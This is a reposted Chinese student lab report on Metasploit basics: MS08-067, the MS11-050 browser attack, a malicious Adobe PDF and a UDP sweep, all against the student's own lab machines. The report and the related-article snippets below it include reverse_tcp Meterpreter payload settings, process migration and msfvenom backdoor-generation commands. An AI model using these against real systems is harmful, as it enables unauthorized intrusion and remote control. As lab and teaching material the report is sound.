20145212 罗天晨 MSF基础应用

最新推荐文章于 2021-05-25 00:44:45 发布
最新推荐文章于 2021-05-25 00:44:45 发布
阅读量115 收藏
点赞数
文章标签: 运维 操作系统 网络
原文链接:http://www.cnblogs.com/alovera/p/6691025.html
版权

一、对exploit,payload,encode的理解

  • exploit是利用系统漏洞,相当于一个动态的过程。
  • payload是攻击载荷,用于实现对漏洞的攻击,是实现漏洞攻击最核心的代码。
  • encode是用于实验特征码伪装的编码,可以实现免杀。

二、实验感想

这次实验运用不同的漏洞进行了攻击,其中比较纠结的攻击就是IE浏览器攻击和最后一个辅助模块的攻击。因为之前老师给出的windowsXP靶机中IE已经是更新过补丁的版本了所以导致攻击各种不成功,后来换了台虚拟机才做好了这个实验。至于辅助模块的攻击……其中有很多是靶机已经安装过补丁的,因此很容易出现攻击无效之类的事情,还有就是因为windows7虚拟机不是正版的原因导致无法下载有漏洞的更新==
并且在小实验四中我感觉盲目的寻找攻击模块太被动了,很容易像我这次实验一样各种撞墙,因为不知道靶机是否存在漏洞,可以选择用一些漏洞扫描工具扫描一下靶机再选择攻击。
从这次的实验中我深刻体会到了更新漏洞补丁是必须的,之前看系统提示漏洞补丁什么的我因为嫌麻烦都忽略了,现在看来可能早已中了什么病毒,找时间好好修补一下漏洞查杀一遍电脑吧……

三、实验步骤:

主动攻击实践(ms08_067漏洞)

  • 1.在kali终端中开启msfconsole,进入如下攻击模块
    877181-20170410223922782-1925892805.png

  • 2.可以输入show payloads查看有效的攻击载荷、输入show targets查看被攻击的靶机的操作系统型号,这里选用了shell_reverse_tcp载荷
    877181-20170410225546297-1094913474.png

  • 3.这里的靶机型号是windowsXP SP3,在可攻击的靶机中有,因此可以被攻击
    877181-20170410225157172-1764147630.png

  • 4.设置有效攻击载荷,并配置好相关ip
    877181-20170410225044860-1058001940.png

  • 5.进行攻击,相当于进入了靶机的命令行中,可以输入dir、ipconfig等等命令进行测试
    877181-20170410230122985-1818743224.png
    877181-20170410225958547-1052427175.png
    (最后那行就是为了截个学号……)

浏览器攻击实践(MS11_050漏洞)

  • 1.进入ms11_050漏洞模块

  • 2.输入info查看信息,可以看出能够受此攻击的有在XP SP3操作系统中的IE7
    877181-20170410232924704-334917896.png

  • 3.设置好攻击载荷之后进行如下配置,然后exploit
    877181-20170411214205579-1952553818.png

  • 4.在靶机上输入ip地址:
    877181-20170411214303313-387765958.png

  • 5.回到kali,可以看出一个进程已经创建好了
    877181-20170411214405907-681904767.png

  • 6.使用session -i 1命令,进入指定的会话,这里对靶机getshell,攻击成功
    877181-20170411214643454-331812352.png

针对客户端的攻击(Adobe阅读器渗透攻击)

  • 1.开启msf,进入adobe_cooltype_sing漏洞模块

  • 2.设置攻击载荷:使用命令set payload windows/meterpreter/reverse_tcp
    877181-20170411212020422-283230307.png

  • 3.作如下设置
    877181-20170411204913719-1798005898.png

  • 4.exploit生成pdf文件,由下图可知生成的文件路径为/root/.msf4/local
    877181-20170411205250610-1379688494.png

  • 5.带.的文件夹是个隐藏文件夹,进入之后将pdf文件拷贝到靶机
    877181-20170411205833454-1095889496.png

  • 6.新建一个监听模块
    877181-20170411211000797-1743157440.png

  • 7.配置相关信息,LHOST和LPORT要与之前的一致
    877181-20170411211012704-483327676.png

  • 8.在靶机中打开pdf文件,回连成功,可以做一些简单的操作查看靶机信息
    877181-20170411211646782-88905150.png

应用辅助模块(auxiliary/scanner/discovery/udp_sweep)

  • 1.show auxiliary查看辅助模块
    877181-20170411222740610-459913865.png
    图中可以详细的看出各个模块的信息

  • 2.找到了这样的一个漏洞:MS15-034
    877181-20170411224430922-589323781.png

  • 3.了解一下漏洞MS15-034
    • HTTP.sys 中的漏洞可能允许远程执行代码 (3042553)
    • 影响范围有Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
    • 安全等级:严重
    • 放上关于漏洞详细信息的网址:https://technet.microsoft.com/zh-cn/library/security/MS15-034

  • 4.在kali中使用search命令查找攻击模块:
    877181-20170411225429704-1143191315.png

  • 5.查看需要设置的信息:
    877181-20170411225747329-1083128613.png
    这里的 concurrent threads指的是并发线程数,设置为2

  • 6.设置参数
    877181-20170411230743204-1493001478.png

  • 7.exploit
    877181-20170411231937532-831604730.png

  • 8.被攻击的靶机上要下载有这个漏洞的软件
    877181-20170411231736501-695249698.png
    877181-20170411231635563-506688473.png

  • 9.结果由于不是正版……很尴尬
    877181-20170411234319110-2107701268.png

  • 10.于是换了一个模块……Dcom漏洞攻击,搜索攻击模块
    877181-20170412084422969-221241386.png

  • 11.进行相关配置,设置攻击目标和选择TCP的反弹模式连接
    877181-20170412084734110-517414888.png

  • 12.没有攻击成功,估计是靶机已经完成了漏洞的补丁,好气啊……
    877181-20170412090041126-925645295.png

  • 13.再试一个!配置什么的省略了这次是对IE浏览器的极光漏洞进行渗透利用的模块
    877181-20170412123542845-59352018.png

  • 14.靶机我也是换了半天……因为有些靶机下载好了补丁之后会直接开启IE调解器
    877181-20170412123022095-954866259.png

  • 15.如果xp 用户发现系统负载重、ie浏览器僵死,会启动任务管理器关闭cpu占用最大的进程,这会导致渗透的会话关闭,出现如下界面:
    877181-20170412123504501-574618806.png

  • 16.这个时候可以利用 migrate 渗透到其它进程,在kali中输入show advanced查看高级选项,输入 set AutoRunScript migrate -f
    877181-20170412124220220-1011331194.png
    877181-20170412124302517-1916468371.png

  • 17.成功,此时靶机会有大量资源被占用,kali中可以看见一个会话被创建
    877181-20170412124101470-832798534.png
    877181-20170412124420767-720437354.png

  • 18.这个时候利用sessions -i num命令就可以对靶机进行各种操作:
    877181-20170412125124830-1735613751.png
    877181-20170412125208830-1097446476.png
    (最后一幅图就是为了截个学号again。。。)

跑题的分割线

  • 19.然而不对……这时候回过神来想想我已经完全跑题了啊这已经不是辅助模块的攻击了!!!换成这个吧udp端口扫描好像还没人做过?
    877181-20170412223004876-1177527389.png

  • 20.相应参数设置:
    877181-20170412223316236-1680149246.png

  • 21.扫描目标udp端口,这次用的靶机是英文版的windowsXP SP3
    877181-20170412223417908-1692539062.png

(1)上图显示目标主机的NetBIOS,查了下资料NetBIOS是计算机局域网领域流行的一种传输方式,有不少关于此的漏洞可以利用。
(2)上图显示扫描到的另一个开放端口是NTP,用于同步网络中各个计算机的时间,是常见的开放UDP端口。

  • 22.换个虚拟机扫描结果出来的东西更少,这个是win7的:
    877181-20170412224644986-343072658.png

  • 23.直接扫描这个网段内的虚拟机查看:
    877181-20170412224826314-1843311845.png

转载于:https://www.cnblogs.com/alovera/p/6691025.html

weixin_30256505
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf简单运用基础
12-16
msf简单运用基础篇,一步一步慢慢来。努力加油
MSF中sessions命令使用
最新发布
qq_44624916的博客
11-28 5208
MSF使用
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2635
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
MSF基本使用
浅笑996的博客
11-10 2621
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
后渗透之获取普通session
ws1813004226的博客
12-29 480
后渗透之获取普通session 一:所需环境:1.kali Linux(攻击机) 2.windows7(靶机) 二:实验步骤:1.在kali终端使用命令msfconsole进入metasploit框架。(msf5) 2.使用命令use exploit/multi/handler进入侦听模块。 3.利用msfvenom命令生成一个shell文件。命令如下: Linux: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost= lport= -f elf
利用beef和msf实现session远程命令
居上
10-24 564
笔记beef启动 beef 的方法msf beef 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 的方法 1.beef-xss 2./usr/share/beef-xss/beef (使用前需要修改默认的用户名称和密码) Web 管理界面 http://127.0.0.1:3000/ui/panel Shellcode http://127.0.0.1:3000/hook.js 测试页面 http://127.0.0.1:3000/demos/butch
基础电子中的MSF业务框架与IMS的关系
11-14
为解决这个问题,MSF通过全球MSF互操作活动(GMl2006)推动IMS基础设施的测试,以确保跨运营商的互操作性和协议有效性。2006年的全球测试活动展示了MSF R3执行协议在多运营商环境中的实用性。 **下一代网络(NGN)...
元器件应用中的MSF系列MSF7905集成电路实用检测数据
11-20
在元器件应用中,MSF7905因其高效能和稳定性而广泛被采用,特别是在索尼MDP-U3/D3型VCD影碟机的电路中,作为IC701的一部分发挥着关键作用。 在实际应用中,MSF7905的性能检测至关重要,以确保其正常工作并提供可靠...
元器件应用中的MSF系列MSF7907L集成电路实用检测数据
11-20
MSF7907L是一款专门用于提供稳定-7伏特电源的集成电路,它在电子设备中的应用至关重要,特别是对于确保电路中各个组件能够获得精确、稳定的电压输入。这款芯片采用了3脚单列直插式塑料封装,设计紧凑,便于在电路板...
元器件应用中的MSF系列MSF7805L集成电路实用检测数据
11-20
在元器件应用中,MSF7805L集成电路的性能检测是维护和故障排查的关键环节。在索尼HCD-700和HOD-V3500型VCD影碟机中,MSF7805L被用作电源稳压器,确保VCD播放机内部电路的正常运行。MF14型三用表是一种常见的多用途...
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 846
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
后渗透通过msfconsole获取一个普通的session
bring_coco的博客
11-05 4106
最近在学后渗透,首先实验一下获取普通session 虚拟机实验环境:1.kali 2.win7 实验步骤: 1.在kali终端中打开msfconsole控制台 2.进入侦听模块 3.再次开启一个终端进行(shift+ctrl+T),查看本机ip 4.利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成exe格式 说明:
msf使用
赵花花08042的博客
05-25 1079
msf 云服务器输入msfconsole,进入msf search 查找需要模块 use 该模块 show options查看需要配置内容 命令行输入 connect www.baidu.com 80 连接百度的80端口 back退出,返回400 应该表示是通的 jobs 显示和管理作业 kill 进程 loadpath 加载模块的路径 load 加载插件 route 查看会话路由信息 系统漏洞利用过程 ~ ms08067 10. 天镜,nessuss,极光扫描器进行漏扫 11. 根据漏扫结果,去
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
msf 获取session 之后
weixin_30460489的博客
12-10 1784
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 ...
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1285
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
20145317彭垚 MSF基础应用
weixin_30341745的博客
04-16 73
20145317彭垚 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。 payload也就相当于载荷,实际上就是之前我们实验中做到的sh...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值